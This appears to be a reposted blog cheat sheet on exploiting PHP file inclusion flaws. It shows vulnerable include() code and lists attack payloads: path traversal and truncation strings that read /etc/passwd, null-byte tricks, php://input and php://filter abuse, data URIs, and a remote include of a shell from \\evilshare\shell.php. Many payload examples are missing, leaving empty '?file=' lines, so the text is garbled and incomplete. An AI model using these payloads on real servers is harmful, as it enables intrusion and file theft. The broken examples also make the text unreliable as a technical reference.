Banner 1

Exploiting PHP File Inclusion – Overview

Para ver mejor la forma de explotación remitir a la fuente.

Recently I see a lot of questions regarding PHP File Inclusions and the possibilities you have. So I decided to give a small overview. All the tricks have been described in detail somewhere earlier, but I like it to have them summed up at one place.

Basic Local File Inclusion:

include("inc/" . $_GET['file']); ?>

  • Including files in the same directory:
  • Path Traversal:
    (this file is very interesting because it lets you search the filesystem, other files)
  • Including injected PHP code:
    Limited Local File Inclusion:
    include("inc/" . $_GET['file'] . ".htm"); ?>
    • Null Byte Injection:
      (requires magic_quotes_gpc=off)
    • Directory Listing with Null Byte Injection:
      (UFS filesystem only, requires magic_quotes_gpc=off, more details here)
    • Path Truncation:
      ?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
      (more details see here and here)
    • Dot Truncation:
      ?file=../../../../../../../../../etc/passwd……………. …
      (Windows only, more details here)
    • Reverse Path Truncation:
      ?file=../../../../ [...] ../../../../../etc/passwd
      (more details here)
    Basic Remote File Inclusion
    include($_GET['file']); ?>
    • Including Remote Code:
      (requires allow_url_fopen=On and allow_url_include=On)
    • Using PHP stream php://input:
      (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
    • Using PHP stream php://filter:
      (lets you read PHP source because it wont get evaluated in base64. More details here and here)
    • Using data URIs:
      (requires allow_url_include=On)
    • Using XSS:
      (makes sense if firewalled or only whitelisted domains allowed)
    Limited Remote File Inclusion
    include($_GET['file'] . ".htm"); ?>
    • ?file=
    • ?file=
    • ?file=
    • (requires allow_url_fopen=On and allow_url_include=On)
    • ?file=\\evilshare\shell.php
    • (bypasses allow_url_fopen=Off)
    Static Remote File Inclusion:
    • Man In The Middle
      (lame indeed, but often forgotten)
    Filter evasion
    • Access files with wildcards (read more here)
    Of course you can combine all the tricks. If you are aware of any other or interesting files to include please leave a comment and I’ll add them.

Links de interés: --Completo

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay